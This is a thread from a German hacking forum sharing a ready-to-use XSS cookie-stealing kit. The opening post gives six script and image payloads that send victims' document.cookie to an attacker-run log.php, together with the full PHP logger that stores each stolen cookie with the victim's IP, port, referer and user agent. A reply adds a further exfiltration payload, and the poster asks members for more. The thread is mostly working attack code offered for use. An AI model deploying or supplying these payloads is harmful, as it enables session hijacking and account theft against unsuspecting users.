Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

[PHP] XSS Exploit

- - - - -

  • Please log in to reply
4 replies to this topic

#1
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
  • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux
instruction.txt (

Please Login HERE or Register HERE to see this link!

):
####################################################################################################
# Installation:
####################################################################################################
German: Laden sie den Inhalt aus dem Ordner "upload" auf ihr Webverzeichnis hoch!
English: Upload the content from the "upload" folder to your web directory!

####################################################################################################
# Payloads:
####################################################################################################
<img src="*" onerror="new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);" alt="" height="0" width="0" />
<script>document.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>location.href='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>var x = new Image();x.src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>window.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>

####################################################################################################
# Clear logs
####################################################################################################
http://own-server.net/test/log.php?clear=1
log.php (

Please Login HERE or Register HERE to see this link!

):
<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown"))
        $ip = $_SERVER["REMOTE_ADDR"];
    else
        $ip = "unknown";
    return ($ip);
}

function logData()
{
    $ipLog            = "data.log";
    $cookie           = $_SERVER["QUERY_STRING"];
    $register_globals = (bool) ini_get("register_gobals");
    if ($register_globals)
        $ip = getenv("REMOTE_ADDR");
    else
        $ip = GetIP();
    
    $rem_port    = $_SERVER["REMOTE_PORT"];
    $user_agent  = $_SERVER["HTTP_USER_AGENT"];
    $rqst_method = $_SERVER["REQUEST_METHOD"];
    $referer     = $_SERVER["HTTP_REFERER"];
    $date        = date("d.m.Y - H:i:s");
    $log         = fopen("$ipLog", "a+");
    
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "####################################################################################################<br /># Date{ : } $date<br /># Cookie: $cookie<br /># IP: $ip<br /># Port: $rem_port<br /># Request-Method: $rqst_method<br /># Referer: $referer<br /># User-Agent: $user_agent <br />####################################################################################################<br /><br />");
    else
        fputs($log, "####################################################################################################\n# Date: $date\n# Cookie: $cookie\n# IP: $ip\n# Port: $rem_port\n# Request-Method: $rqst_method\n# Referer: $referer\n# User-Agent: $user_agent\n####################################################################################################\n\n");
    fclose($log);
}

if (isset($_GET["cookie"]) && ($_GET["cookie"] != "")) {
    logData();
} else {
}

if (isset($_GET["clear"]) && ($_GET["clear"] == "1")) {
    $string = "";
    $fp     = fopen("data.log", "w");
    fwrite($fp, $string);
    fclose($fp);
} else {
}

exit();

?>
Download:

Please Login HERE or Register HERE to see this link!


Edited by SecurityFlaw, 26 February 2017 - 19:00 Uhr.

  • Born2Hack, hacked and 0x7E1 like this

#2
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 posts
  • 346 Bedankt
document.write('<img src="http://myserver.com/log.php?cookie='+document.cookie+'" alt="Placeholder" />');


#3
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 posts
  • 46 Bedankt

Oder einfach

Please Login HERE or Register HERE to see this link!

nutzen ...

\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00

=>

$user_agent  = $_SERVER["HTTP_USER_AGENT"];
fputs($log, ...'# User-Agent: $user_agent');

:(

Edited by pi^2, 20 February 2017 - 00:12 Uhr.

  • SecurityFlaw likes this

#4
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
  • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Wer noch andere Payloads findet um das Pookie an's PHP-File zu senden bitte hinzufügen.

Ich aktualisiere die instructions.txt sobald sich ein paar weitere finden. ;)



#5
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
  • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

instruction.txt - UPDATED!





  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 61 user(s)


    0x7E1, 13asim37, Alsuna, Antonio24, B1nary, Bloodman, bones, Born2Hack, brucereed64, Bypass, C.I.K, C4shin0ut, Caruso, Ch!ller, CyberFlash, daredevil_hellfire207, dev-0, dos, easysurfer, exploitablerootkit, Exynos, Fliege*, Fr0nz, Framerater, Freshpolak, Givenchy, gutzuu, hacked, Hansiberg, Haxlor, JohnR, Joker Dark Knight, Juri, kakao1, Kayotokit, keyb0ardz, kiwitone, loginman1, m1dge2, marcf2009, MarkSantos, NichtDiePolizei, nong_dan, PadX18, PaulaAbdul, pi^2, pwcca, python_snippet, SecurityFlaw, SepaX, Shadowgun, shiznith, Silent0wn3r, smc2014, Smn, sniffer, st0rm, VerZus, xVirtu, ZeroC00L, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.